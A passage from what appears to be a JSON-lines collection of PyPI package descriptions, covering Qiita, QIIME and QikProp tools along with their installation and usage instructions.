Status](https://travis-ci.org/uraxy/qiidly.svg?branch=master)](https://travis-ci.org/uraxy/qiidly)Feedly\u306eAndroid\u30a2\u30d7\u30ea\u306f\u5feb\u9069\uff01blog\u3092\u8aad\u3080\u3060\u3051\u3058\u3083\u3082\u3063\u305f\u3044\u306a\u3044\u3001Qiita\u306e\u65b0\u7740\u8a18\u4e8b\u3082\u30c1\u30a7\u30c3\u30af\u3059\u308b\u3068\u3082\u3063\u3068\u5feb\u9069\uff01\u305d\u306e\u305f\u3081\u306b\u306f\u2026- Qiita\u3067\u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u30bf\u30b0- Qiita\u3067\u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u30e6\u30fc\u30b6\u30fc\u3092\u30ab\u30f3\u30bf\u30f3\u306bFeedly\u306b\u540c\u671f\u3067\u304d\u306a\u304d\u3083\u3002\u305d\u306e\u305f\u3081\u306e\u30c4\u30fc\u30eb\u304cqiidly\u306a\u306e\u3060\u3002-----qiidly\u306f\u3001Qiita\u3067\u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u30bf\u30b0\u3068\u30e6\u30fc\u30b6\u30fc\u306e\u30d5\u30a3\u30fc\u30c9\u3092Feedly\u306b\u540c\u671f\u3059\u308b\u30c4\u30fc\u30eb\u3067\u3059\u3002Qiita\u3067\u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u3082\u306e\u306f\u3001Feedly\u306b\u6b21\u306e\u30ab\u30c6\u30b4\u30ea\u3067\u767b\u9332\u3055\u308c\u307e\u3059\u3002- \u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u30bf\u30b0 -> Qiita:tags- \u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u30e6\u30fc\u30b6\u30fc -> Qiita:followeesQiita\u3067\u30d5\u30a9\u30ed\u30fc\u3092\u89e3\u9664\u3057\u305f\u3082\u306e\u306f\u3001Feedly\u304b\u3089\u524a\u9664\u3055\u308c\u307e\u3059\u3002\u30d5\u30a3\u30fc\u30c9\u304c\u65e2\u306b\u4ed6\u306e\u30ab\u30c6\u30b4\u30ea\u3067\u767b\u9332\u3055\u308c\u3066\u3044\u308b\u5834\u5408\u3001\u305d\u306e\u30ab\u30c6\u30b4\u30ea\u3067\u306e\u767b\u9332\u306f\u7dad\u6301\u3055\u308c\u307e\u3059\u3002\u3064\u307e\u308a\u3001qiidly\u3067\u540c\u671f\u3057\u305f\u3053\u3068\u3067\u3001\u30d5\u30a3\u30fc\u30c9\u306e\u767b\u9332\u304c\u306a\u304f\u306a\u3063\u305f\u308a\u3001\u30ab\u30c6\u30b4\u30ea\u304c\u6d88\u3048\u3061\u3083\u3063\u305f\u308a\u3059\u308b\u3053\u3068\u306f\u3042\u308a\u307e\u305b\u3093\u3002Setup=====Libraries---------```sh$ pip install -r requirements.txt```- [Python Wrapper for Qiita API v2](https://github.com/petitviolet/qiita_py) ([MIT License](https://petitviolet.mit-license.org/))API Access token----------------Qiita access token- https://qiita.com/settings/applicationsFeedly developer access token- https://developer.feedly.com/v3/developer/#how-do-i-generate-a-developer-access-tokenUsage=====```bash$ python -m qiidly.command_line -husage: command_line.py [-h] -q QIITA_TOKEN -f FEEDLY_TOKENqiidly: Qiita to Feedly.optional arguments:-h, --help show this help message and exit-q QIITA_TOKEN, --qiita-token QIITA_TOKENQiita access token-f FEEDLY_TOKEN, --feedly-token FEEDLY_TOKENFeedly developer access token$``````sh$ ./qiidly.sh # == python -m qiidly.command_line -q $QIITA_TOKEN -f $FEEDLY_TOKEN## Category at Qiita: 'Qiita:tags'+ linebot- gwt+ onsenui\t=> categories['dummy', 'Qiita:tags']- Cytoscape\t=> categories['dummy']Sync following tag feeds at Qiita to Feedly? [y/n] yDone!## Category at Qiita: 'Qiita:followees'- uraxySync to Feedly? [y/n] yDone!$```Tests=====with unittest-------------```bash$ python -m unittest discover tests```with nose---------```bash$ nosetests --with-coverage --cover-html --cover-package=qiidly..........Name Stmts Miss Cover--------------------------------------qiidly.py 0 0 100%qiidly/feedly.py 35 14 60%qiidly/main.py 108 84 22%qiidly/qiita.py 45 25 44%--------------------------------------TOTAL 188 123 35%----------------------------------------------------------------------Ran 10 tests in 0.190sOK$ google-chrome cover/index.html$```License=======MIT License"} +{"package": "qiime", "pacakge-description": "QIIME: Quantitative Insights Into Microbial Ecologyhttp://www.qiime.orgQIIME Allows Integration and Analysis of High-Throughput Community Sequencing Data\nJ. Gregory Caporaso, Justin Kuczynski, Jesse Stombaugh, Kyle Bittinger, Frederic D. Bushman, Elizabeth K. Costello, Noah Fierer, Antonio Gonzalez Pena, Julia K. Goodrich, Jeffrey I. Gordon, Gavin A. Huttley, Scott T. Kelley, Dan Knights, Jeremy E. Koenig, Ruth E. Ley, Cathy A. Lozupone, Daniel McDonald, Brian D. Muegge, Meg Pirrung, Jens Reeder, Joel R. Sevinsky, Peter J. Turnbaugh, William van Treuren, William A. Walters, Jeremy Widmann, Tanya Yatsunenko, Jesse Zaneveld and Rob Knight.\nNature Methods, 2010."} +{"package": "qiime_2_ll_quick_viewer", "pacakge-description": "Qiime 2Ley LabQuick ViewerThis tool launches a simple web server to quickly visualize the contents locate into thedatafolder from\naQiime 2visualization artifact, i.e. files produced byQiime 2with extension*.qzv.Free software: MIT licenseInstallationYou can install this tool on a Python 3.5+ environment using either PIPpip install qiime_2_ll_quick_vieweror Condaconda install-cleylabmpi qiime_2_ll_quick_viewerUsageGiven aQiime 2visualization artifact e.g.demux.qzvyou can run this command on your server:$ qiime_2_ll_quick_viewer--filename/full_path_to/demux.qzvBy default,qiime_2_ll_quick_viewerwill launch a web server on the port8089but you can change it for the one you want with the option--portXXXX.\nThen, you can for example open a SSH tunnel to the remote port opened on your server byqiime_2_ll_quick_viewerwith this command:$ ssh-L8089:localhost:8089 user@your_serverFinally, open a browser and go to this address:http://localhost:8089.Command options:-f,--filenameTEXTFullpathtoaQiime2visualizationfile(*.qzv).[required]-p,--portINTEGERPorttolaunchthewebserver.[required]-h,--helpShowthehelpinfoandexit.CreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.2.8 (2017-11-30)Updated version for Python 3.5+ and TOX testing.0.2.7 (2017-11-30)Updated version for Python 3.5+.0.2.6 (2017-11-29)Changes into the RST files.0.2.5 (2017-11-29)Generated a base version for a Conda package.0.2.4 (2017-11-29)Documentation has been updated to be markdown friendly.0.2.3 (2017-11-28)Repository migrated to Ley Lab\u2019s Github account.0.2.2 (2017-11-27)Documentation updated.0.2.1 (2017-11-27)Documentation updated.0.2.0 (2017-11-27)First functional version of the package.0.1.0 (2017-11-27)First release on PyPI."} +{"package": "qiime2utils", "pacakge-description": "qiime2utils is a command-line tool for manipulating Qiime 2 data."} +{"package": "qiime-default-reference", "pacakge-description": "qiime-default-referenceqiime-default-reference, canonically pronouncedchime default reference, is a\nPython package containing default reference data files for use withQIIME. The current default reference data is compiled\nfrom the Greengenes 16S rRNA database version13_8.\nPlease see theAttributionsection below for more details.InstallationTo install qiime-default-reference:pip install qiime-default-referenceRunning the testsTo run qiime-default-reference\u2019s unit tests:nosetests --with-doctest qiime_default_referenceAttributionThe reference data distributed in this Python package were copied from theGreengenes 16S rRNA database:An improved Greengenes taxonomy with explicit ranks for ecological and\nevolutionary analyses of bacteria and archaea.McDonald D, Price MN, Goodrich J, Nawrocki EP, DeSantis TZ, Probst A,\nAndersen GL, Knight R, Hugenholtz P.\nISME J. 2012 Mar;6(3):610-8. doi: 10.1038/ismej.2011.139.The Greengenes reference data is licensed under aCreative Commons Attribution-ShareAlike 3.0 Unported License.The default template alignment column mask (i.e., \u201cLane mask\u201d) is derived from:Lane,D.J. (1991)16S/23S rRNA sequencing.In Stackebrandt,E. and\nGoodfellow,M. (eds), Nucleic Acid Techniques in Bacterial Systematics.\nJohn Wiley and Sons, New York, pp. 115-175.Lane mask was originally available inARB.Lane mask taken fromhere.Getting HelpPlease post your questions about this repository/package on theQIIME Forum."} +{"package": "qiime-tools", "pacakge-description": "NOTICEThe QIIME-tools project is now obsolete and has been\nreplaced byPhyloToAST. The new project is available on GitHub and\non PyPI. PhyloToAST can be installed with pip:$pipinstallphylotoastQIIME-toolsThe QIIME-tools project is a collection of python code and scripts that\nmodify the original QIIME [1] pipeline by adding/changing several\nsteps including: support for cluster-computing, multiple primer support\n(eliminate primer bias) [2], enhanced support for species-specific\nanalysis, and additional visualization tools.InstallationTo install QIIME-tools from PyPI:$pipinstallqiime-toolsFrom source:$pythonsetup.pyinstallDocumentationFull documentation for the scripts and code is available at theQIIME-tools documentation siteRequirementsmatplotlibfor PCoA plots.Biopythonfor some sequence and fastq\nprocessing, although its use is being phased out.fuzzpyfor the\notu_calc module. Note that these are not listed as dependencies in the install\nscript because they are not required for all functionality. Install as needed.SourceTheQIIME-tools sourceis hosted on github.CitingA manuscript describing the qiime-tools software is currently in\npreparation. Until publication, please cite the github repository and\nthe author: Shareef M. Dabdoub.Publications using QIIME-toolsMason et al.,The subgingival microbiome of clinically healthy current\nand never smokers. The ISME Journal, 2014;doi:10.1038/ismej.2014.114Dabdoub et al.,Patient-specific Analysis of Periodontal and Peri-implant Microbiomes.\nJournal of Dental Research, 2013;doi: 10.1177/0022034513504950References[1] J Gregory Caporaso, et al.,QIIME allows analysis of\nhigh-throughput community sequencing data. Nature Methods, 2010;doi:10.1038/nmeth.f.303[2] Kumar PS, et al.,Target Region Selection Is a Critical Determinant\nof Community Fingerprints Generated by 16S Pyrosequencing. PLoS ONE\n(2011) 6(6): e20956.doi:10.1371/journal.pone.0020956"} +{"package": "qiipy", "pacakge-description": "No description available on PyPI."} +{"package": "qi-irida-utils", "pacakge-description": "# QI IRIDA Utils[![Linux](https://img.shields.io/travis/happykhan/qi-irida-utils.svg)](https://travis-ci.org/happykhan/qi-irida-utils)\n[![Windows build status on\nAppveyor](https://ci.appveyor.com/api/projects/status/github/happykhan/qi-irida-utils?branch=master&svg=true)](https://ci.appveyor.com/project/happykhan/qi-irida-utils/branch/master)\n[![Documentation\nStatus](https://readthedocs.org/projects/qi-irida-utils/badge/?version=latest)](https://qi-irida-utils.readthedocs.io/en/latest/?badge=latest)\n[![pypi](https://img.shields.io/pypi/v/qi-irida-utils.svg)](https://pypi.python.org/pypi/qi-irida-utils)\n[![Docker build\nstatus](https://img.shields.io/docker/pulls/happykhan/qi-irida-utils.svg)](https://hub.docker.com/r/happykhan/qi-irida-utils)[![Coverage](https://img.shields.io/coveralls/happykhan/qi-irida-utils/master.svg)](https://coveralls.io/r/happykhan/qi-irida-utils/)\n[![Coverage](https://img.shields.io/scrutinizer/g/happykhan/qi-irida-utils.svg)](https://scrutinizer-ci.com/g/happykhan/qi-irida-utils/?branch=master)\n[![Updates](https://pyup.io/repos/github/happykhan/qi-irida-utils/shield.svg)](https://pyup.io/repos/github/happykhan/qi-irida-utils/)Helper scripts for working with IRIDASee the documentation for more details:\n.## Introduction## Quick start## Installation## Usage## Outputs## LicenseQI IRIDA Utils is free software, licensed under GNU General Public\nLicense v3## Feedback/IssuesPlease report any issues to the [issues\npage](https://github.com/happykhan/qi-irida-utils/issues).## CitationQI IRIDA Utils is not formally published. Please cite\nThis package was created with\n[Cookiecutter](https://github.com/audreyr/cookiecutter) and the [QI\npython template](https://github.com/happykhan/qi-python-package) project\ntemplate.# History## 0.1.0 (2019-01-22)First release on PyPI."} +{"package": "qiita", "pacakge-description": "Python wrapper for Qiita API v1.Installation$ virtualenv --distribute qiita_sample\n$ source qiita_sample/bin/activate\n$ cd qiita_sample\n$ pip install qiitaQiita depends onRequests.UsageGet user\u2019s items# -*- coding: utf-8 -*-\nfrom qiita import Items\n\nclient = Items()\nitems = client.user_items('heavenshell')Get tag\u2019s items# -*- coding: utf-8 -*-\nfrom qiita import Tags\n\nclient = Tags()\nitems = client.tag_items('python')Get a specified item with comments and raw markdown content# -*- coding: utf-8 -*-\nfrom qiita import Items\n\nclient = Items()\nitem_uuid = '1234567890abcdefg'\nitems = client.item(item_uuid)Authenticated requestsLogin with \u201cusername & password\u201d or \u201ctoken\u201d# -*- coding: utf-8 -*-\nfrom qiita import Client\n\nclient = Client(url_name='heavenshell', password='mysecret')\ntoken = client.token # => contains token\n# or\nclient = Client(token='myauthtoken')Get my items# -*- coding: utf-8 -*-\nfrom qiita import Items\n\nclient = Client(token='myauthtoken')\nitems = client.user_item()Post/Update/Delete an item# -*- coding: utf-8 -*-\nfrom qiita import Items\n\nclient = Client(token='myauthtoken')\nparams = {\n 'title': 'Hello',\n 'body': 'markdown text',\n 'tags': [{name: 'python', versions: ['2.6', '2.7']}],\n 'private': False\n}\n# post\nitem = client.post_item(params)\n\n# update\nparams['title'] = 'modified'\nclient.update_item(item['uuid'], params)\n\n# delete\nclient.delete_item(item['uuid'])Stock/Unstock item# -*- coding: utf-8 -*-\nfrom qiita import Items\n\nclient = Items(token='myauthtoken')\nitem_uuid = '1489e2b291fed74713b2'\n# Stock\nclient.stock_item(item_uuid)\n\n# Unstock\nclient.unstock_item(item_uuid)ContributingFork itCreate your feature branch (git checkout -b my-new-feature)Commit your changes (git commit -am \u2018Add some feature\u2019)Push to the branch (git push origin my-new-feature)Create new Pull Request"} +{"package": "qiita_api_wrapper", "pacakge-description": "Qiita API V2 wrapper for Python. detail linkhttps://qiita.com/api/v2/docs#%E3%82%B3%E3%83%A1%E3%83%B3%E3%83%88"} +{"package": "qiitacli", "pacakge-description": "Welcome to QiitaCLI\u2019s documentation!Qiita CLI ClientCUI\u3067Qiita\u306e\u6295\u7a3f\u3092\u3057\u305f\u304f\u3066\u4f5c\u3063\u305f\u3082\u306e\u3067\u3059\u3002Install$pipinstallqiitacliDocumenthttps://mypaceshun.github.io/qiitacliQuickStart\u4e8b\u524d\u6e96\u5099Qiita\u306b\u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u4f5c\u6210https://qiita.com/Qiita\u500b\u4eba\u7528\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u3092\u53d6\u5f97Qiita\u306b\u30ed\u30b0\u30a4\u30f3\u5f8c\u3001\u8a2d\u5b9a\u2192\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u2192\u500b\u4eba\u7528\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u306e\u3068\u3053\u308d\u304b\u3089\u65b0\u3057\u304f\u30c8\u30fc\u30af\u30f3\u3092\u767a\u884c\u3059\u308b\u3002\u30b9\u30b3\u30fc\u30d7\u306fread_qiita\u3068write_qiita\u306b\u30c1\u30a7\u30c3\u30af\u3092\u5165\u308c\u3066\u304f\u3060\u3055\u3044\u3002\u767a\u884c\u5f8c\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u304c\u8868\u793a\u3055\u308c\u308b\u306e\u3067\u30b3\u30d4\u30fc\u30da\u30fc\u30b8\u3092\u96e2\u308c\u308b\u3068\u518d\u5ea6\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u3092\u8868\u793a\u3059\u308b\u3053\u3068\u306f\u51fa\u6765\u307e\u305b\u3093status\u30b3\u30de\u30f3\u30c9\u3092\u5229\u7528\u3057\u3066\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u3092\u4fdd\u5b58\u3057\u307e\u3059\u3002$qiitaclistatusInput your personal accesstoken: xxxxx\nid : mypaceshun\nname : shun kawai\nlocation : Tokyo Japan\n...\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u306f\u30c7\u30d5\u30a9\u30eb\u30c8\u3067$HOME/.qiitacli.secret\u306b\u4fdd\u5b58\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u76f4\u63a5\u7de8\u96c6\u3059\u308b\u3053\u3068\u3067\u3082\u3001\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u3092\u8a2d\u5b9a\u51fa\u6765\u307e\u3059\u3002\u8a18\u4e8b\u4e00\u89a7\u53d6\u5f97$qiitaclilist-iduid|date|title|url\nc3b97c4eee490d662092|2019-10-18T19:35:23+09:00|Qiita CLI Application \u4f5c\u3063\u3066\u307f\u305f|https://qiita.com/mypaceshun/items/c3b97c4eee490d662092\nab441d26a12489d5fcbd|2019-02-01T11:37:55+09:00|ansible \u301c\u3064\u306a\u3050\u301c|https://qiita.com/mypaceshun/items/ab441d26a12489d5fcbd\nb1f3786ce0580201a9e1|2018-12-16T07:01:55+09:00|python\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092rpm\u306b\u30d1\u30c3\u30b1\u30fc\u30b8\u30f3\u30b0|https://qiita.com/mypaceshun/items/b1f3786ce0580201a9e1\n5067561d6739cc9e5199|2018-12-19T10:58:45+09:00|spec\u30d5\u30a1\u30a4\u30eb\u5927\u89e3\u5256|https://qiita.com/mypaceshun/items/5067561d6739cc9e5199\nfeedced17884d798fbbd|2016-03-14T13:03:04+09:00|XAMPP\u3067Apache\u3092\u8d77\u52d5\u3057Android\u304b\u3089\u63a5\u7d9a|https://qiita.com/mypaceshun/items/feedced17884d798fbbd\nc489327d525522de5e65|2016-02-15T10:48:32+09:00|AndroidStudio2.0\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3066\u307f\u308b|https://qiita.com/mypaceshun/items/c489327d525522de5e65\u8a18\u4e8b\u306e\u6295\u7a3f$qiitacliuploadarticle.md\u8a18\u4e8b\u7528\u306eMarkdown\u30d5\u30a1\u30a4\u30eb\u3067\u306f\u3001YAML\u5f62\u5f0f\u306e\u30d8\u30c3\u30c0\u30fc\u3092\u5229\u7528\u3057\u3066\u3001\u30bf\u30a4\u30c8\u30eb\u3084\u30bf\u30b0\u306a\u3069\u306e\u60c5\u5831\u3092\u8a18\u8ff0\u3057\u307e\u3059\u3002title\u3068tags\u306e\u60c5\u5831\u304c\u5fc5\u9808\u3067\u3001\u8a2d\u5b9a\u304c\u7121\u3044\u5834\u5408\u306f\u30b3\u30de\u30f3\u30c9\u304c\u5931\u6557\u3057\u307e\u3059\u3002qiitacli.md\u3092\u53c2\u8003\u306b\u3057\u3066\u304f\u3060\u3055\u3044\u3002\u8a18\u4e8b\u306e\u66f4\u65b0$qiitacliupdatearticleidarticle.md\u8a18\u4e8b\u3092\u66f4\u65b0\u3059\u308b\u969b\u306f\u6295\u7a3f\u306b\u7528\u3044\u305fMarkdown\u30d5\u30a1\u30a4\u30eb\u3068\u540c\u69d8\u306e\u5f62\u5f0f\u3067\u8a18\u4e8b\u7528\u30d5\u30a1\u30a4\u30eb\u3092\u7528\u610f\u3057\u3066\u304f\u3060\u3055\u3044\u3002\u307e\u305f\u4e0a\u66f8\u304d\u3059\u308b\u305f\u3081\u306e\u66f4\u65b0\u5bfe\u8c61\u306e\u8a18\u4e8b\u306eID\u304c\u5fc5\u8981\u306b\u306a\u308a\u307e\u3059\u3002list\u30b3\u30de\u30f3\u30c9\u306a\u3069\u3092\u7528\u3044\u3066\u66f4\u65b0\u5bfe\u8c61\u306e\u8a18\u4e8b\u306eID\u3092\u63a2\u3057\u3066\u307f\u3066\u304f\u3060\u3055\u3044\u3002\u8a18\u4e8b\u306e\u524a\u9664$qiitaclideletearticleid\u8a18\u4e8b\u306e\u524a\u9664\u3067\u306f\u3001\u524a\u9664\u5bfe\u8c61\u306e\u8a18\u4e8b\u306eID\u304c\u5fc5\u8981\u306b\u306a\u308a\u307e\u3059\u3002list\u30b3\u30de\u30f3\u30c9\u306a\u3069\u3092\u7528\u3044\u3066\u524a\u9664\u5bfe\u8c61\u306e\u8a18\u4e8b\u306eID\u3092\u63a2\u3057\u3066\u307f\u3066\u304f\u3060\u3055\u3044\u3002Release\u30ea\u30ea\u30fc\u30b9\u30ce\u30fc\u30c8"} +{"package": "qiita-spots", "pacakge-description": "Qiita (canonically pronouncedcheetah) is an analysis environment for microbiome (and other \u201ccomparative -omics\u201d) datasets. You can find the public Qiita server athttp://qiita.microbio.me.Qiita is currently in alpha status. We are very open to community contributions and feedback. If you\u2019re interested in contributing to Qiita, seeCONTRIBUTING.md. If you\u2019d like to report bugs or request features, you can do that in theQiita issue tracker.To install and configure your own Qiita server, seeINSTALL.md."} +{"package": "qiita-sync", "pacakge-description": "Qiita-SyncQiita-Sync is a GitHub Actions that can synchronize your markdown files in GitHub repository with Qiita articles.It can be also used as a command line tool.\nSee more detailsQiita-Sync Command Usagefor command usage.InstallationQiita Access TokenGenerate your access tokenOpenQiita Account ApplicationsClick \"Generate new token\"Copy the access token displayed.Save the access token to GitHubOpen your GitHub repositoryGo \"Settings\" >> \"Secrets\"Click \"New repository secrets\"Save the access token with the nameQIITA_ACCESS_TOKENGitHub ActionsDownload 2 YAML files of GitHub Actionsqiita_sync.ymlqiita_sync_check.ymlSave them in your repository as:.github/workflow/qiita_sync.yml.github/workflow/qiita_sync_check.ymlNOTE: Change the cron timecron: \"29 17 * * *\"ofqiita_sync_check.ymlwhich is the time\nwhen this action is sheduled to be executed.29 17 * * *indicates that this action is\nexecuted every day at 17:29 UTC, which is kind of inactive time for me who is living in Japan.\nPlease adjust it to your convenience.Push them to GitHubBadgeYou can add the link to badge in your README file to show if Qiita and GitHub are successfully synchronized or not.\nPlease replaeceandof your own.![Qiita Sync](https://github.com///actions/workflows/qiita_sync_check.yml/badge.svg)Then the badge will be displayed in your README file.synchronized badge:unsynchronized badge:SynchronizationWhen you notice the failure of synchronization by the badge in README or e-mail notification from GitHub,\nyou can manually run Qiita-Sync GitHub Actions to synchronize them again.Open your GitHub repositoryGo \"Actions\" >> \"Qiita Sync\" (in left pane)Click \"Run workflow\" (in right pane)Writing ArticlesPlease note some features of Qiita-Sync when writing articles.File NameWhen downloading Qiita article files at first, their file names are like2020-07-08_TypeScript_d3c8f2234ea428e4563a.mdwhose\nnaming convention is \"__.md\". For your convenience,\nyou can rename those files as you like and can move them to any subdirectories within your git repository directory.Article HeaderEach downloaded article file has a header. This header is automatically generated when downloaded from Qiita site.\nAnd it is automatically removed when uploaded to Qiita site.You can cangetitleandtagsas you like. Howeveryou must not removeidfrom the header.\nIt's a key information for synchronization with Qiita site.And thisidmust be unique. Only one file can included it in the header.\nPlease not to create article files that have sameid, which can happen when copying an article file.When creating new article file, you don't needidin the header.Theidwill be automatically added to the header after uploaded to Qiita site.Links to Qiita articleYou can use a relative file path as a link to another your article file.\n[My Article](../my-article.md)This link will be automatically changed to the URL when uploaded to Qiita site.\n[My Article](https://qiita.com/ryokat3/items/a5b5328c93bad615c5b2)And it will be automatically changed to the relative file path when downloaded from Qiita site.Links to image fileYou can use a relative file path as a link to an image file.\n![My Image](../image/earth.png)This link will be automatically changed to the URL when uploaded to Qiita site.\n![My Image](https://raw.githubusercontent.com/ryokat3/qiita-articles/main/image/earth.png)And it will be automatically changed to the relative file path when downloaded from Qiita site.Revision HistoryVersionDateSummaryv1.4.42021-02-21- Fixed the issue #61, enchanced code block splitterv1.4.02021-01-21- Understandable file naming when initially downloadedv1.3.42021-01-18- Internal data enhancement, verbose optionsv1.3.32021-01-16- Fixed version numberv1.3.22021-01-15- Fixed packaging failurev1.3.12021-01-15- Fixed many issues when used as CLIv1.3.02021-01-15- Withdrawn from PyPIv1.2.02021-01-11- Fixed getting Git timestamp and branch namev1.1.12021-01-11- Withdrawn from PyPIv1.1.02021-01-10- Initial release"} +{"package": "qiita_v2", "pacakge-description": "Api document:http://qiita.com/api/v2/docsVersion0.2.0(2018/11/07)Setupqiita_v2: Python Package Indexpip install qiita_v2How to UseSimple usagefrom qiita_v2.client import QiitaClient\n\nclient = QiitaClient(access_token=)\nres = client.get_user('petitviolet')\nres.to_json()\n# => jsonified contentsLisenceMIT License"} +{"package": "qii-tool", "pacakge-description": "Quantitative Input Influence - an influence measures for Algorithmic TransparencyTheqii_toolpackage is an implementation of the QII method proposed in the paper\"Algorithmic Transparency via Quantitative Input Influence: Theory and Experiments with Learning Systems\". The original paper discusses the transparency-privacy tradeoff, whereas this particular package only exploits its transparency aspect to be used as an influence measures - an instance of interpretable machine learning.Installqii_toolon your system using:pipinstallqii_toolExamples can be found in thisrepository."} +{"package": "qi.jabberHelpdesk", "pacakge-description": "qi.jabberHelpdeskOverviewqi.jabberHelpdesk is a real-time helpdesk product for plone. With it you can create helpdesks as content objects. Clients access the helpdesks through the web, whereas helpdesk agents connect to the helpdesk server using their jabber accounts. A helpdesk can be linked to many jabber accounts and whenever a client asks for support, one is chosen randomly among the available agents. qi.jabberHelpdesk also supports:file transfersurl links and email addressessmileysIn order to run qi.jabberHelpdesk to your own site you need either:A free account on thechatblox.comsite in which case you don\u2019t need your own server, orTo run a helpdesk server (You will need three modules qi.xmpp.botfarm, qi.xmpp.client, qi.xmpp.admin all found on pypi). Please read their documentation for installation details.InstallationInstalling with buildoutIf you are usingbuildoutto manage your instance installing qi.jabberHelpdesk is very simple, just add qi.jabberHelpdesk in theeggssection and register it in thezcmlsections.Installing without buildoutIf you don\u2019t use buildout put it in INSTANCE/lib/python and add a file named qi.jabberHelpdesk-configure.zcml in INSTANCE/etc/package-includes with the following line:UsageFollow the following steps in order to create a helpdesk in your site:Add a helpdesk. If you don\u2019t use the helpdesk of your chatblox.com account you\u2019ll need to create a bot on your own jabber server that the helpdesk will use.Add the jabber ids of the agents to the helpdesk.The owners of the jabber ids should accept the bot as a contact.You are ready to go!Changelog for qi.jabberHelpdeskqi.jabberHelpdesk - 0.30Security fixes, some vulnerable xml-rpc calls fixed. [ggozad]qi.jabberHelpdesk - 0.22Changed name field to accept UTF8 characters. Thanks to Geir Baekholt for spotting this. [ggozad]qi.jabberHelpdesk - 0.21Fixed portlet issue with UberSelectionWidget. Credits to Graham Perrin for reporting it. Fixeshttp://plone.org/products/qi-jabberhelpdesk/issues/7[ggozad]qi.jabberHelpdesk - 0.20Added the possibility to download chat transcripts. [ggozad]Improved error handling. [ggozad]Broke down css and kss resources so that they can be easily overriden. [ggozad]Added upgrade steps for Generic Setup. [ggozad]qi.jabberHelpdesk - 0.13The user is presented with the message \u201cNo available agents\u201d when no agents are available and tries to connect. Fixeshttp://plone.org/products/qi-jabberhelpdesk/issues/3[ggozad]Improved the chat request screen for logged in members [ggozad]Fixed conflict with qi.jabberHelpdesk. Fixeshttp://plone.org/products/qi-jabberhelpdesk/issues/2[ggozad]qi.jabberHelpdesk - 0.12Forced all links that appear in the chat window to open in new windows. [ggozad]Added \u201cPlease wait while checking for available agents\u2026\u201d message while checking with xmlrpc server. [ggozad]qi.jabberHelpdesk - 0.11Fixed portlet, and added image field to it. [ggozad]qi.jabberHelpdesk - 0.1 UnreleasedInitial package structure. [zopeskel]"} +{"package": "qi.jwMedia", "pacakge-description": "Introductionqi.jwMedia is a plone add-on that provides audio/video content types. It uses the JW FLV MediaPlayer (http://www.longtailvideo.com/).\nIt supports the following features:\n1) Uses blobs if plone.app.blob is installed.\n2) Size, stretching, fullscreen are all settable.\n3) Watermarks.\n4) Closed captions.RTMP streaming is in working state but only using a customized Red5 streaming server. When finalized it will be released in a future version.Commercial UseJW Player is distributed under a non-GPL license and for commercial use you will need to purchase a license. Please see their site for details.Changelog0.5b3Fixed image setting on video and audio0.5b2Caption check fixed.Fixed typo for stretching field in video.0.5bAdded basic test0.4b2Properly uploaded correct svn branch;)0.4b1Initial release"} +{"package": "qikdb", "pacakge-description": "No description available on PyPI."} +{"package": "qikpropservice", "pacakge-description": "MolSSI QikProp As A Service API Wrapper LibraryA library which wraps the API calls for the QikProp v3 As A ServiceThe version of QikProp reached by this library has been provided byWilliam L. Jorgensenand hosted as a service by theMolecular Sciences Software Institute (MolSSI). To report a\nproblem or suggest improvements, please open an issue onthe Project GitHub. Additional features and options will be\nadded over time.This project serves as the Python wrapper for making the API calls by providing both an importable\nlibrary and a CLI tool to make calls to the QikProp Service.For direct information regarding the API endpoints, please seethe Project GitHub.Installation From Conda or PipThis package can be installed from either Conda (via Conda-Forge) or Pipcondainstall-cconda-forgeqikpropserviceORpipinstallqikpropserviceInstallation from SourceClone the repo athttps://github.com/MolSSI/qikpropserviceNavigate to the folderapiwrapperRunpython setup.py installUsage as a CLI ToolThe CLI can be run from any command line interface by invokingqikpropcliThe CLI provides its own documentation for how to use it, but most commonly can be used as such:qikpropclirunFILESWhereFILEScan be replaced with any number of entries of files to submit to the QikProp Service API endpoints.\nThere are options which can be specified here such as custom URI server's (e.g. for local testing) or QikProp\noptions, but all of those are documented in the--helpflag.Usage as a Python LibraryThere are two main library functions depending on if you want to do large bulk processing, or more fine-grained\nfile-by-file processing. In either use case, the library works on on-disk files rather than data pre-read\ninto memory.The main helper function isqikprop_as_a_servicewhich acts much as the CLI does in that it processes many files\nall the same way.fromqikpropserviceimportqikprop_as_a_serviceqikprop_as_a_service(\"file1.mol, file2.mol, ligand_series*.mol2\")This will run the two named filesfile1.mol,file2.moland all the files matching the globligand_series*.mol2.\nIt is possible to set the output name of each of the returned.tar.gzfiles through a keyword. Other options such as\nwhat settings that can be passed to QikProp are available as well. See the function docstring or callqikprop_as_a_service.__doc__to see the options.The second object is the API Endpoint call wrapperQikpropAsAServicewhich can be used to\nintegrate with exiting pipelines and make each of the API calls directly, without having to write the request itself\ndirectly. This class only works on a per-call/file basis. Theqikprop_as_a_servicefunction uses this class to make\nall of its calls and operations on each file. Its most common invocation is below (wrapped in a practical use), but\nthings such as the URI, endpoints, hashing functions, etc. can all be set in the class initialization.fromqikpropserviceimportQikpropAsAService,QikPropOptionsfromtimeimportsleepservice=QikpropAsAService()# Example of options, there are defaults for this model and it does not need to be passed to the Service calls# if only defaults are 